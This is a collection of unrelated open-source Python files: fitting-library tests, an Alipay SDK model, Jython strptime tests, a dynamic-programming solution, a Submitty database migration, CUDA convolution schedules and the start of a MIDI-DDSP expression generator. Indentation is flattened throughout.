result = fit.stat_surface(datasets=[dataset], x="x", y="y")
assert_allclose(result["x_scan"], x_values, atol=1e-7)
assert_allclose(result["y_scan"], y_values, atol=1e-7)
expected_stat = [
[1.0001e04, 1.0000e00, 1.0001e04],
[1.0000e04, 0.0000e00, 1.0000e04],
[1.0001e04, 1.0000e00, 1.0001e04],
]
assert_allclose(list(result["stat_scan"]), expected_stat, atol=1e-7)
assert len(result["fit_results"]) == 0
# Check that original value state wasn't changed
assert_allclose(dataset.models.parameters["x"].value, 2)
assert_allclose(dataset.models.parameters["y"].value, 3e2)
def test_stat_surface_reoptimize():
dataset = MyDataset()
fit = Fit()
fit.run([dataset])
x_values = [1, 2, 3]
y_values = [2e2, 3e2, 4e2]
dataset.models.parameters["z"].value = 0
dataset.models.parameters["x"].scan_values = x_values
dataset.models.parameters["y"].scan_values = y_values
result = fit.stat_surface(
datasets=[dataset], x="x", y="y", reoptimize=True
)
assert_allclose(result["x_scan"], x_values, atol=1e-7)
assert_allclose(result["y_scan"], y_values, atol=1e-7)
expected_stat = [
[1.0001e04, 1.0000e00, 1.0001e04],
[1.0000e04, 0.0000e00, 1.0000e04],
[1.0001e04, 1.0000e00, 1.0001e04],
]
assert_allclose(list(result["stat_scan"]), expected_stat, atol=1e-7)
assert_allclose(
result["fit_results"][0][0].total_stat, result["stat_scan"][0][0], atol=1e-7
)
def test_stat_contour():
dataset = MyDataset()
dataset.models.parameters["x"].frozen = True
fit = Fit(backend="minuit")
fit.optimize([dataset])
result = fit.stat_contour(datasets=[dataset], x="y", y="z")
assert result["success"] is True
x = result["y"]
assert_allclose(len(x), 10)
assert_allclose(x[0], 299, rtol=1e-5)
assert_allclose(x[-1], 299.292893, rtol=1e-5)
y = result["z"]
assert_allclose(len(y), 10)
assert_allclose(y[0], 0.04, rtol=1e-5)
assert_allclose(y[-1], 0.747107, rtol=1e-5)
# Check that original value state wasn't changed
assert_allclose(dataset.models.parameters["y"].value, 300)
|
alipay/aop/api/domain/AlipayMarketingCrowdDataSyncModel.py | snowxmas/alipay-sdk-python-all | 213 | 12688576 | <gh_stars>100-1000
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class AlipayMarketingCrowdDataSyncModel(object):
def __init__(self):
self._biz_from = None
self._create_id = None
self._crowd_id = None
self._crowd_name = None
self._crowd_size = None
self._crowd_status = None
self._end_time = None
self._owner_id = None
self._start_time = None
self._update_circle_type = None
@property
def biz_from(self):
return self._biz_from
@biz_from.setter
def biz_from(self, value):
self._biz_from = value
@property
def create_id(self):
return self._create_id
@create_id.setter
def create_id(self, value):
self._create_id = value
@property
def crowd_id(self):
return self._crowd_id
@crowd_id.setter
def crowd_id(self, value):
self._crowd_id = value
@property
def crowd_name(self):
return self._crowd_name
@crowd_name.setter
def crowd_name(self, value):
self._crowd_name = value
@property
def crowd_size(self):
return self._crowd_size
@crowd_size.setter
def crowd_size(self, value):
self._crowd_size = value
@property
def crowd_status(self):
return self._crowd_status
@crowd_status.setter
def crowd_status(self, value):
self._crowd_status = value
@property
def end_time(self):
return self._end_time
@end_time.setter
def end_time(self, value):
self._end_time = value
@property
def owner_id(self):
return self._owner_id
@owner_id.setter
def owner_id(self, value):
self._owner_id = value
@property
def start_time(self):
return self._start_time
@start_time.setter
def start_time(self, value):
self._start_time = value
@property
def update_circle_type(self):
return self._update_circle_type
@update_circle_type.setter
def update_circle_type(self, value):
self._update_circle_type = value
def to_alipay_dict(self):
params = dict()
if self.biz_from:
if hasattr(self.biz_from, 'to_alipay_dict'):
params['biz_from'] = self.biz_from.to_alipay_dict()
else:
params['biz_from'] = self.biz_from
if self.create_id:
if hasattr(self.create_id, 'to_alipay_dict'):
params['create_id'] = self.create_id.to_alipay_dict()
else:
params['create_id'] = self.create_id
if self.crowd_id:
if hasattr(self.crowd_id, 'to_alipay_dict'):
params['crowd_id'] = self.crowd_id.to_alipay_dict()
else:
params['crowd_id'] = self.crowd_id
if self.crowd_name:
if hasattr(self.crowd_name, 'to_alipay_dict'):
params['crowd_name'] = self.crowd_name.to_alipay_dict()
else:
params['crowd_name'] = self.crowd_name
if self.crowd_size:
if hasattr(self.crowd_size, 'to_alipay_dict'):
params['crowd_size'] = self.crowd_size.to_alipay_dict()
else:
params['crowd_size'] = self.crowd_size
if self.crowd_status:
if hasattr(self.crowd_status, 'to_alipay_dict'):
params['crowd_status'] = self.crowd_status.to_alipay_dict()
else:
params['crowd_status'] = self.crowd_status
if self.end_time:
if hasattr(self.end_time, 'to_alipay_dict'):
params['end_time'] = self.end_time.to_alipay_dict()
else:
params['end_time'] = self.end_time
if self.owner_id:
if hasattr(self.owner_id, 'to_alipay_dict'):
params['owner_id'] = self.owner_id.to_alipay_dict()
else:
params['owner_id'] = self.owner_id
if self.start_time:
if hasattr(self.start_time, 'to_alipay_dict'):
params['start_time'] = self.start_time.to_alipay_dict()
else:
params['start_time'] = self.start_time
if self.update_circle_type:
if hasattr(self.update_circle_type, 'to_alipay_dict'):
params['update_circle_type'] = self.update_circle_type.to_alipay_dict()
else:
params['update_circle_type'] = self.update_circle_type
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = AlipayMarketingCrowdDataSyncModel()
if 'biz_from' in d:
o.biz_from = d['biz_from']
if 'create_id' in d:
o.create_id = d['create_id']
if 'crowd_id' in d:
o.crowd_id = d['crowd_id']
if 'crowd_name' in d:
o.crowd_name = d['crowd_name']
if 'crowd_size' in d:
o.crowd_size = d['crowd_size']
if 'crowd_status' in d:
o.crowd_status = d['crowd_status']
if 'end_time' in d:
o.end_time = d['end_time']
if 'owner_id' in d:
o.owner_id = d['owner_id']
if 'start_time' in d:
o.start_time = d['start_time']
if 'update_circle_type' in d:
o.update_circle_type = d['update_circle_type']
return o
|
Lib/test/test_strptime_jy.py | jeff5/jython-whinchat | 577 | 12688580 | # Java locale differences from JDK 9 onwards, and locale variation on
# developer machines, break test_strptime tests. This manifests more on Windows.
# Rather than diverge from the Python source, this overrides with extra locale
# setup.
# Merging back into CPython is desirable, but is a bigger discussion around
# library merging generally.
import unittest
from datetime import datetime
from time import strptime
from test.test_strptime import *
from test import test_support
class ParsingTests(unittest.TestCase):
def test_iso8601(self):
now = datetime.utcnow().replace(microsecond=0)
self.assertEqual(now, datetime.strptime(now.isoformat('T'), "%Y-%m-%dT%H:%M:%S"))
# tests bug 1662
self.assertEqual(now, datetime.strptime(now.isoformat('T') + 'Z', "%Y-%m-%dT%H:%M:%SZ"))
def test_IllegalArgument_to_ValueError(self):
with self.assertRaises(ValueError):
d = strptime('', '%e')
def test_issue1964(self):
d = strptime('0', '%f')
self.assertEqual(1900, d.tm_year)
def test_issue2112(self):
d = strptime('1', '%d')
self.assertEqual(1900, d.tm_year)
def test_main(initialize=True):
test_support.force_reset_locale(initialize)
test_support.run_unittest(
getlang_Tests,
LocaleTime_Tests,
TimeRETests,
StrptimeTests,
Strptime12AMPMTests,
JulianTests,
CalculationTests,
CacheTests,
ParsingTests
)
if __name__ == '__main__':
test_main(initialize=False)
|
Dynamic Programming/Create Maximum Cost List/solution.py | iabhimanyu/Algorithms | 715 | 12688590 | '''
@author: <NAME>
Filling one cell: O(1)
Filling all cells: O(2xn) = O(n)
'''
def find_maximum_cost(Y):
values = [[0 for _ in range(2)] for _ in range(len(Y))]
# Go on with adding these 2 options
i = 1
while i < len(Y):
# Put these two options
values[i][0] = max(values[i - 1][0], values[i - 1][1] + Y[i - 1] - 1)
values[i][1] = max(values[i - 1][1] + abs(Y[i] - Y[i - 1]), values[i - 1][0] + Y[i] - 1)
i += 1
#print(values)
return max(values[len(Y) - 1][0], values[len(Y) - 1][1])
def main():
Y = [5, 6, 8, 13, 9]
cost = find_maximum_cost(Y)
print(cost)
# Output: 34
main()
|
migration/migrator/migrations/course/20200402034200_overall_comments.py | zeez2030/Submitty | 411 | 12688624 | <reponame>zeez2030/Submitty
"""Migration for a given Submitty course database."""
def up(config, database, semester, course):
"""
Run up migration.
:param config: Object holding configuration details about Submitty
:type config: migrator.config.Config
:param database: Object for interacting with given database for environment
:type database: migrator.db.Database
:param semester: Semester of the course being migrated
:type semester: str
:param course: Code of course being migrated
:type course: str
"""
# Create overall comment table
database.execute(
"""
CREATE TABLE IF NOT EXISTS gradeable_data_overall_comment (
goc_id integer NOT NULL,
g_id character varying(255) NOT NULL,
goc_user_id character varying(255),
goc_team_id character varying(255),
goc_grader_id character varying(255) NOT NULL,
goc_overall_comment character varying NOT NULL,
CONSTRAINT goc_user_team_id_check CHECK (goc_user_id IS NOT NULL OR goc_team_id IS NOT NULL)
);
"""
)
database.execute("ALTER TABLE gradeable_data_overall_comment DROP CONSTRAINT IF EXISTS gradeable_data_overall_comment_pkey")
database.execute(
"""
ALTER TABLE ONLY gradeable_data_overall_comment
ADD CONSTRAINT gradeable_data_overall_comment_pkey PRIMARY KEY (goc_id);
"""
)
database.execute("ALTER TABLE gradeable_data_overall_comment DROP CONSTRAINT IF EXISTS gradeable_data_overall_comment_g_id_fkey")
database.execute(
"""
ALTER TABLE ONLY gradeable_data_overall_comment
ADD CONSTRAINT gradeable_data_overall_comment_g_id_fkey FOREIGN KEY (g_id) REFERENCES gradeable(g_id) ON DELETE CASCADE;
"""
)
database.execute("ALTER TABLE gradeable_data_overall_comment DROP CONSTRAINT IF EXISTS gradeable_data_overall_comment_goc_user_id_fkey")
database.execute(
"""
ALTER TABLE ONLY gradeable_data_overall_comment
ADD CONSTRAINT gradeable_data_overall_comment_goc_user_id_fkey FOREIGN KEY (goc_user_id) REFERENCES users(user_id) ON DELETE CASCADE;
"""
)
database.execute("ALTER TABLE gradeable_data_overall_comment DROP CONSTRAINT IF EXISTS gradeable_data_overall_comment_goc_team_id_fkey")
database.execute(
"""
ALTER TABLE ONLY gradeable_data_overall_comment
ADD CONSTRAINT gradeable_data_overall_comment_goc_team_id_fkey FOREIGN KEY (goc_team_id) REFERENCES gradeable_teams(team_id) ON DELETE CASCADE;
"""
)
database.execute("ALTER TABLE gradeable_data_overall_comment DROP CONSTRAINT IF EXISTS gradeable_data_overall_comment_goc_grader_id")
database.execute(
"""
ALTER TABLE ONLY gradeable_data_overall_comment
ADD CONSTRAINT gradeable_data_overall_comment_goc_grader_id FOREIGN KEY (goc_grader_id) REFERENCES users(user_id) ON DELETE CASCADE;
"""
)
database.execute("ALTER TABLE gradeable_data_overall_comment DROP CONSTRAINT IF EXISTS gradeable_data_overall_comment_user_unique")
database.execute("ALTER TABLE ONLY gradeable_data_overall_comment ADD CONSTRAINT gradeable_data_overall_comment_user_unique UNIQUE (g_id, goc_user_id, goc_grader_id);")
database.execute("ALTER TABLE gradeable_data_overall_comment DROP CONSTRAINT IF EXISTS gradeable_data_overall_comment_team_unique")
database.execute("ALTER TABLE ONLY gradeable_data_overall_comment ADD CONSTRAINT gradeable_data_overall_comment_team_unique UNIQUE (g_id, goc_team_id, goc_grader_id);")
database.execute(
"""
CREATE SEQUENCE IF NOT EXISTS gradeable_data_overall_comment_goc_id_seq
START WITH 1
INCREMENT BY 1
NO MINVALUE
NO MAXVALUE
CACHE 1;
""")
database.execute("ALTER SEQUENCE gradeable_data_overall_comment_goc_id_seq OWNED BY gradeable_data_overall_comment.goc_id;")
database.execute("ALTER TABLE ONLY gradeable_data_overall_comment ALTER COLUMN goc_id SET DEFAULT nextval('gradeable_data_overall_comment_goc_id_seq'::regclass);")
# All old overall comments belong to the instructor
instructor_id = database.execute("SELECT user_id FROM users WHERE user_group = 1;").first()[0]
rows = database.execute("""
SELECT
g_id,
gd_user_id,
gd_team_id,
gd_overall_comment
FROM
gradeable_data;
"""
)
for g_id, user_id, team_id, comment in rows:
query = '''
INSERT INTO gradeable_data_overall_comment
(
g_id,
goc_user_id,
goc_team_id,
goc_grader_id,
goc_overall_comment
) VALUES (
:g_id, :user_id, :team_id, :grader_id, :comment
)
ON CONFLICT
DO NOTHING;
'''
params = {
'g_id':g_id,
'user_id':user_id,
'team_id':team_id,
'grader_id':instructor_id,
'comment':comment
}
database.session.execute(query, params)
def down(config, database, semester, course):
"""
Run down migration (rollback).
:param config: Object holding configuration details about Submitty
:type config: migrator.config.Config
:param database: Object for interacting with given database for environment
:type database: migrator.db.Database
:param semester: Semester of the course being migrated
:type semester: str
:param course: Code of course being migrated
:type course: str
"""
pass
|
flextensor/testing/others/test_conv2d_cuda_different_schedule.py | imxian/FlexTensor | 135 | 12688632 | <gh_stars>100-1000
"""
Test different schedule on conv2d_nchw
Target NVIDIA GPU
====================================
**Author**: `<NAME>`
"""
import tvm
import json
from flextensor.measure import _evaluate
from flextensor.nn import conv2d_nchw
from flextensor.configs.conv2d_config import yolo_shapes_b8
from flextensor.utils import any_factor_split
class Parameter(object):
def __init__(self):
self.b_factors = [2, 4, 1, 1]
self.k_factors = [8, 4, 8, 2]
self.p_factors = [7, 1, 2, 1]
self.q_factors = [1, 1, 14, 1]
self.rc_factors = [1, 32, 32]
self.ry_factors = [1, 1, 1]
self.rx_factors = [1, 1, 1]
def __str__(self):
ret = ""
ret += str(self.b_factors) + "\n"
ret += str(self.k_factors) + "\n"
ret += str(self.p_factors) + "\n"
ret += str(self.q_factors) + "\n"
ret += str(self.rc_factors) + "\n"
ret += str(self.ry_factors) + "\n"
ret += str(self.rx_factors) + "\n"
return ret
def schedule_yolo_conv_cuda_1(s, outputs, inputs, weight, parameter):
# inline the padding operation
padded = outputs.op.input_tensors[0]
# create cache
write_cache = s.cache_write(outputs, "local")
read_share_weight = s.cache_read(weight, "shared", [write_cache])
# read_local_weight = s.cache_read(read_share_weight, "local", [write_cache])
read_share_inputs = s.cache_read(padded, "shared", [write_cache])
# read_local_inputs = s.cache_read(read_share_inputs, "local", [write_cache])
b_factors = parameter.b_factors
k_factors = parameter.k_factors
p_factors = parameter.p_factors
q_factors = parameter.q_factors
rc_factors = parameter.rc_factors
ry_factors = parameter.ry_factors
rx_factors = parameter.rx_factors
# prepare thread_axis
bx = tvm.te.thread_axis("blockIdx.x")
by = tvm.te.thread_axis("blockIdx.y")
bz = tvm.te.thread_axis("blockIdx.z")
vx = tvm.te.thread_axis("vthread")
vy = tvm.te.thread_axis("vthread")
vz = tvm.te.thread_axis("vthread")
tx = tvm.te.thread_axis("threadIdx.x")
ty = tvm.te.thread_axis("threadIdx.y")
tz = tvm.te.thread_axis("threadIdx.z")
# split the spatial axes
b, k, p, q = s[outputs].op.axis
kernel_scope, b = s[outputs].split(b, nparts=1)
bo, bi = s[outputs].split(b, nparts=b_factors[0])
ko, ki = s[outputs].split(k, nparts=k_factors[0])
po, pi = s[outputs].split(p, nparts=p_factors[0])
qo, qi = s[outputs].split(q, nparts=q_factors[0])
vbo, bi = s[outputs].split(bi, nparts=b_factors[1])
vko, ki = s[outputs].split(ki, nparts=k_factors[1])
vpo, pi = s[outputs].split(pi, nparts=p_factors[1])
vqo, qi = s[outputs].split(qi, nparts=q_factors[1])
tbo, bi = s[outputs].split(bi, nparts=b_factors[2])
tko, ki = s[outputs].split(ki, nparts=k_factors[2])
tpo, pi = s[outputs].split(pi, nparts=p_factors[2])
tqo, qi = s[outputs].split(qi, nparts=q_factors[2])
# reorder
s[outputs].reorder(bo, ko, po, qo, vbo, vko, vpo, vqo, tbo, tko, tpo, tqo, bi, ki, pi, qi)
# fuse
bko = s[outputs].fuse(bo, ko)
vbko = s[outputs].fuse(vbo, vko)
tbko = s[outputs].fuse(tbo, tko)
bki = s[outputs].fuse(bi, ki)
# bind
s[outputs].bind(bko, bz)
s[outputs].bind(po, by)
s[outputs].bind(qo, bx)
s[outputs].bind(vbko, vz)
s[outputs].bind(vpo, vy)
s[outputs].bind(vqo, vx)
s[outputs].bind(tbko, tz)
s[outputs].bind(tpo, ty)
s[outputs].bind(tqo, tx)
# compute at write cache
s[write_cache].compute_at(s[outputs], tqo)
rc, ry, rx = s[write_cache].op.reduce_axis
rco, rci = s[write_cache].split(rc, nparts=rc_factors[0])
rcm, rci = s[write_cache].split(rci, nparts=rc_factors[1])
ryo, ryi = s[write_cache].split(ry, nparts=ry_factors[0])
rym, ryi = s[write_cache].split(ryi, nparts=ry_factors[1])
rxo, rxi = s[write_cache].split(rx, nparts=rx_factors[0])
rxm, rxi = s[write_cache].split(rxi, nparts=rx_factors[1])
a, b, c, d = s[write_cache].op.axis
s[write_cache].reorder(rco, ryo, rxo, rcm, rym, rxm, rci, ryi, rxi, a, b, c, d)
# compute at read cache
s[read_share_weight].compute_at(s[write_cache], rxm)
# s[read_local_weight].compute_at(s[write_cache], rxi)
s[read_share_inputs].compute_at(s[write_cache], rxm)
# s[read_local_inputs].compute_at(s[write_cache], rxi)
# cooperative fetching
for cache in [read_share_inputs, read_share_weight]:
cb, ck, ch, cw = s[cache].op.axis
fused = s[cache].fuse(cb, ck, ch, cw)
fused, bindx = s[cache].split(fused, factor=q_factors[2])
fused, bindy = s[cache].split(fused, factor=p_factors[2])
fused, bindz = s[cache].split(fused, factor=b_factors[2] * k_factors[2])
s[cache].bind(bindx, tx)
s[cache].bind(bindy, ty)
s[cache].bind(bindz, tz)
s[outputs].pragma(kernel_scope, 'auto_unroll_max_step', 1500)
s[outputs].pragma(kernel_scope, 'unroll_explicit', 1)
s[padded].compute_inline()
def schedule_yolo_conv_cuda_2(s, outputs, inputs, weight, parameter):
# inline the padding operation
padded = outputs.op.input_tensors[0]
# create cache
write_cache = s.cache_write(outputs, "local")
read_share_weight = s.cache_read(weight, "shared", [write_cache])
# read_local_weight = s.cache_read(read_share_weight, "local", [write_cache])
read_share_inputs = s.cache_read(padded, "shared", [write_cache])
# read_local_inputs = s.cache_read(read_share_inputs, "local", [write_cache])
b_factors = parameter.b_factors
k_factors = parameter.k_factors
p_factors = parameter.p_factors
q_factors = parameter.q_factors
rc_factors = parameter.rc_factors
ry_factors = parameter.ry_factors
rx_factors = parameter.rx_factors
# prepare thread_axis
bx = tvm.te.thread_axis("blockIdx.x")
by = tvm.te.thread_axis("blockIdx.y")
bz = tvm.te.thread_axis("blockIdx.z")
vx = tvm.te.thread_axis("vthread")
vy = tvm.te.thread_axis("vthread")
vz = tvm.te.thread_axis("vthread")
tx = tvm.te.thread_axis("threadIdx.x")
ty = tvm.te.thread_axis("threadIdx.y")
tz = tvm.te.thread_axis("threadIdx.z")
# split the spatial axes
b, k, p, q = s[outputs].op.axis
kernel_scope, b = s[outputs].split(b, nparts=1)
ko, ki = s[outputs].split(k, nparts=k_factors[0])
po, pi = s[outputs].split(p, nparts=p_factors[0])
qo, qi = s[outputs].split(q, nparts=q_factors[0])
vko, ki = s[outputs].split(ki, nparts=k_factors[1])
vpo, pi = s[outputs].split(pi, nparts=p_factors[1])
vqo, qi = s[outputs].split(qi, nparts=q_factors[1])
tko, ki = s[outputs].split(ki, nparts=k_factors[2])
tpo, pi = s[outputs].split(pi, nparts=p_factors[2])
tqo, qi = s[outputs].split(qi, nparts=q_factors[2])
# reorder
s[outputs].reorder(ko, po, qo, vko, vpo, vqo, tko, tpo, tqo, ki, pi, qi)
# s[outputs].reorder(po, bko, qo, vqo, vbko, vpo, tbko, tpo, tqo, bki, pi, qi)
# fuse
bko = s[outputs].fuse(b, ko)
# bind
s[outputs].bind(bko, bz)
s[outputs].bind(po, by)
s[outputs].bind(qo, bx)
s[outputs].bind(vko, vz)
s[outputs].bind(vpo, vy)
s[outputs].bind(vqo, vx)
s[outputs].bind(tko, tz)
s[outputs].bind(tpo, ty)
s[outputs].bind(tqo, tx)
# compute at write cache
s[write_cache].compute_at(s[outputs], tqo)
rc, ry, rx = s[write_cache].op.reduce_axis
rco, rci = s[write_cache].split(rc, nparts=rc_factors[0])
rcm, rci = s[write_cache].split(rci, nparts=rc_factors[1])
ryo, ryi = s[write_cache].split(ry, nparts=ry_factors[0])
rym, ryi = s[write_cache].split(ryi, nparts=ry_factors[1])
rxo, rxi = s[write_cache].split(rx, nparts=rx_factors[0])
rxm, rxi = s[write_cache].split(rxi, nparts=rx_factors[1])
a, b, c, d = s[write_cache].op.axis
s[write_cache].reorder(rco, ryo, rxo, rcm, rym, rxm, rci, ryi, rxi, a, b, c, d)
# compute at read cache
s[read_share_weight].compute_at(s[write_cache], rxm)
# s[read_local_weight].compute_at(s[write_cache], rxi)
s[read_share_inputs].compute_at(s[write_cache], rxm)
# s[read_local_inputs].compute_at(s[write_cache], rxi)
# cooperative fetching
for cache in [read_share_inputs, read_share_weight]:
cb, ck, ch, cw = s[cache].op.axis
fused = s[cache].fuse(cb, ck, ch, cw)
fused, bindx = s[cache].split(fused, factor=q_factors[2])
fused, bindy = s[cache].split(fused, factor=p_factors[2])
fused, bindz = s[cache].split(fused, factor=k_factors[2])
s[cache].bind(bindx, tx)
s[cache].bind(bindy, ty)
s[cache].bind(bindz, tz)
s[outputs].pragma(kernel_scope, 'auto_unroll_max_step', 1500)
s[outputs].pragma(kernel_scope, 'unroll_explicit', 1)
s[padded].compute_inline()
def schedule_yolo_conv_cuda_3(s, outputs, inputs, weight, parameter):
# inline the padding operation
padded = outputs.op.input_tensors[0]
# create cache
write_cache = s.cache_write(outputs, "local")
read_share_weight = s.cache_read(weight, "shared", [write_cache])
# read_local_weight = s.cache_read(read_share_weight, "local", [write_cache])
read_share_inputs = s.cache_read(padded, "shared", [write_cache])
# read_local_inputs = s.cache_read(read_share_inputs, "local", [write_cache])
b_factors = parameter.b_factors
k_factors = parameter.k_factors
p_factors = parameter.p_factors
q_factors = parameter.q_factors
rc_factors = parameter.rc_factors
ry_factors = parameter.ry_factors
rx_factors = parameter.rx_factors
# prepare thread_axis
bx = tvm.te.thread_axis("blockIdx.x")
by = tvm.te.thread_axis("blockIdx.y")
bz = tvm.te.thread_axis("blockIdx.z")
vx = tvm.te.thread_axis("vthread")
vy = tvm.te.thread_axis("vthread")
vz = tvm.te.thread_axis("vthread")
tx = tvm.te.thread_axis("threadIdx.x")
ty = tvm.te.thread_axis("threadIdx.y")
tz = tvm.te.thread_axis("threadIdx.z")
# split the spatial axes
b, k, p, q = s[outputs].op.axis
kernel_scope, b = s[outputs].split(b, nparts=1)
bo, bi = s[outputs].split(b, nparts=b_factors[0])
ko, ki = s[outputs].split(k, nparts=k_factors[0])
po, pi = s[outputs].split(p, nparts=p_factors[0])
qo, qi = s[outputs].split(q, nparts=q_factors[0])
vbo, bi = s[outputs].split(bi, nparts=b_factors[1])
vko, ki = s[outputs].split(ki, nparts=k_factors[1])
vpo, pi = s[outputs].split(pi, nparts=p_factors[1])
vqo, qi = s[outputs].split(qi, nparts=q_factors[1])
tbo, bi = s[outputs].split(bi, nparts=b_factors[2])
tko, ki = s[outputs].split(ki, nparts=k_factors[2])
tpo, pi = s[outputs].split(pi, nparts=p_factors[2])
tqo, qi = s[outputs].split(qi, nparts=q_factors[2])
# reorder
s[outputs].reorder(bo, ko, po, qo, vbo, vko, vpo, vqo, tbo, tko, tpo, tqo, bi, ki, pi, qi)
# fuse
outer = s[outputs].fuse(bo, ko, po, qo)
middle = s[outputs].fuse(vbo, vko, vpo, vqo)
inner = s[outputs].fuse(tbo, tko, tpo, tqo)
# bind
s[outputs].bind(outer, bx)
s[outputs].bind(inner, tx)
# compute at write cache
s[write_cache].compute_at(s[outputs], inner)
rc, ry, rx = s[write_cache].op.reduce_axis
rco, rci = s[write_cache].split(rc, nparts=rc_factors[0])
rcm, rci = s[write_cache].split(rci, nparts=rc_factors[1])
ryo, ryi = s[write_cache].split(ry, nparts=ry_factors[0])
rym, ryi = s[write_cache].split(ryi, nparts=ry_factors[1])
rxo, rxi = s[write_cache].split(rx, nparts=rx_factors[0])
rxm, rxi = s[write_cache].split(rxi, nparts=rx_factors[1])
a, b, c, d = s[write_cache].op.axis
s[write_cache].reorder(rco, ryo, rxo, rcm, rym, rxm, rci, ryi, rxi, a, b, c, d)
# compute at read cache
s[read_share_weight].compute_at(s[write_cache], rxm)
# s[read_local_weight].compute_at(s[write_cache], rxi)
s[read_share_inputs].compute_at(s[write_cache], rxm)
# s[read_local_inputs].compute_at(s[write_cache], rxi)
# cooperative fetching
for cache in [read_share_inputs, read_share_weight]:
cb, ck, ch, cw = s[cache].op.axis
fused = s[cache].fuse(cb, ck, ch, cw)
fused, bindx = s[cache].split(fused, factor=b_factors[2] * k_factors[2] * p_factors[2] * q_factors[2])
s[cache].bind(bindx, tx)
s[outputs].pragma(kernel_scope, 'auto_unroll_max_step', 1500)
s[outputs].pragma(kernel_scope, 'unroll_explicit', 1)
s[padded].compute_inline()
def schedule_yolo_conv_opencl(s, outputs, inputs, weight):
# inline the padding operation
padded = outputs.op.input_tensors[0]
# prepare thread_axis
bx = tvm.te.thread_axis("blockIdx.x")
# split the spatial axes
b, k, p, q = s[outputs].op.axis
bo, bi = s[outputs].split(b, nparts=1)
s[outputs].bind(bo, bx)
s[padded].compute_inline()
def try_yolo_conv(config, parameter, fsch):
# get the compute
# (1, 3, 448, 448, 64, 3, 7, 7, 1, 2, 3, 1, 1)
batch, CI, H, W, CO, _, kh, kw, _, st, pad, dilation, group = config
inputs = tvm.te.placeholder((batch, CI, H, W), dtype="float32")
weight = tvm.te.placeholder((CO, CI, kh, kw), dtype="float32")
outputs = conv2d_nchw(inputs, weight, stride=st, padding=pad, dilation=dilation, groups=group)
s = tvm.te.create_schedule(outputs.op)
fsch(s, outputs, inputs, weight, parameter)
arg_bufs = [inputs, weight, outputs]
stmt = tvm.lower(s, arg_bufs, simple_mode=True)
# print(stmt)
dev_id = 2
ctx = tvm.nd.context("cuda", dev_id)
max_dims = ctx.max_thread_dimensions
kwargs = {
"max_shared_memory_per_block": ctx.max_shared_memory_per_block,
"max_threads_per_block": ctx.max_threads_per_block,
"max_thread_x": max_dims[0],
"max_thread_y": max_dims[1],
"max_thread_z": max_dims[2]
}
verify = tvm.tir.ir_pass.VerifyGPUCode(stmt, kwargs)
# print("config is:\n %s" % (str(config)))
if verify:
print("Valid kernel")
time_cost = _evaluate(s, arg_bufs, "cuda", dev_id, 10)
print("Yolo conv use", time_cost, "ms\n")
else:
print("Invalid kernel")
time_cost = float("inf")
return time_cost
if __name__ == "__main__":
res = []
parameters = []
with open("yolo_conv_b8_parameters.txt", "r") as fin:
for line in fin:
_, content = line.split(":", 1)
obj = json.loads(content)
op_parameters = obj[0]
conv_parameters = op_parameters[1]
parameter = Parameter()
parameter.b_factors = conv_parameters["spatial"][0]
parameter.k_factors = conv_parameters["spatial"][1]
parameter.p_factors = conv_parameters["spatial"][2]
parameter.q_factors = conv_parameters["spatial"][3]
parameter.rc_factors = conv_parameters["reduce"][0]
parameter.ry_factors = conv_parameters["reduce"][1]
parameter.rx_factors = conv_parameters["reduce"][2]
parameters.append(parameter)
for config, parameter in list(zip(yolo_shapes_b8, parameters))[:]:
cost = try_yolo_conv(config, parameter, schedule_yolo_conv_cuda_3)
res.append(cost)
for ele in res:
print(ele)
|
midi_ddsp/modules/expression_generator.py | magenta/midi-ddsp | 169 | 12688633 | # Copyright 2022 The MIDI-DDSP Authors.
# #
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# #
# http://www.apache.org/licenses/LICENSE-2.0
# #
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Expression generator module class."""
from abc import ABC
import tensorflow as tf
from ddsp.training import nn
from midi_ddsp.data_handling.instrument_name_utils import NUM_INST
from midi_ddsp.modules.cond_rnn import TwoLayerCondAutoregRNN
tfk = tf.keras
tfkl = tfk.layers
class LangModelOutputLayer(tfkl.Layer):
def __init__(self, n_out, nhid=256):
super().__init__()
self.n_out = n_out
self.dense_out = nn.FcStackOut(ch=nhid, layers=2, n_out=self.n_out)
def call(self, inputs):
outputs = self.dense_out(inputs)
outputs = {'raw_output': outputs}
return outputs
class ExpressionGenerator(TwoLayerCondAutoregRNN, tf.keras.Model, ABC):
"""Expression Generator that takes note sequence as input and predicts
note expression controls."""
# TODO:(yusongwu) merge teacher_force and autoregressive function,
# things need to change:
# def sample_out(self, out, cond, time, training=False):
# curr_out = self.sample_out(curr_out, cond, i, training=training)
# output = self.split_teacher_force_output(output, cond)
def __init__(self, n_out=6, nhid=128, norm=True, dropout=0.5):
super().__init__(
nhid=nhid,
n_out=n_out,
input_dropout=True,
input_dropout_p=0.5,
dropout=dropout,
)
self.birnn = tfkl.Bidirectional(tfkl.GRU(
units=nhid, return_sequences=True, dropout=dropout
), )
self.dense_out = LangModelOutputLayer(nhid=nhid, n_out=self.n_out)
self.norm = nn.Normalize('layer') if norm else None
self.pitch_emb = tfkl.Embedding(128, 64)
self.duration_emb = tfkl.Dense(64)
self.instrument_emb = tfkl.Embedding(NUM_INST, 64)
def autoregressive(self, cond, training=False):
note_pitch = cond['note_pitch'][..., tf.newaxis]
cond = self.encode_cond(cond, training=training)
batch_size = cond.shape[0]
length = cond.shape[1]
prev_out = tf.tile([[0.0]], [batch_size, self.n_out])[:, tf.newaxis,
:] # go_frame
prev_states = (None, None)
overall_outputs = []
for i in range(length):
curr_cond = cond[:, i, :][:, tf.newaxis, :]
prev_out = self.encode_out(prev_out)
curr_out, curr_states = self._one_step(curr_cond, prev_out, prev_states,
training=training)
curr_out = self.sample_out(curr_out,
note_pitch[:, i, :][:, tf.newaxis, :])
overall_outputs.append(curr_out)
prev_out, prev_states = curr_out['output'], curr_states
outputs = {}
for k in curr_out.keys():
outputs[k] = tf.concat([x[k] for x in overall_outputs], 1)
return outputs
def teacher_force(self, cond, out, training=True):
note_pitch = cond['note_pitch'][..., tf.newaxis]
out_shifted = self.right_shift_encode_out(out)
cond = self.encode_cond(cond, training=training)
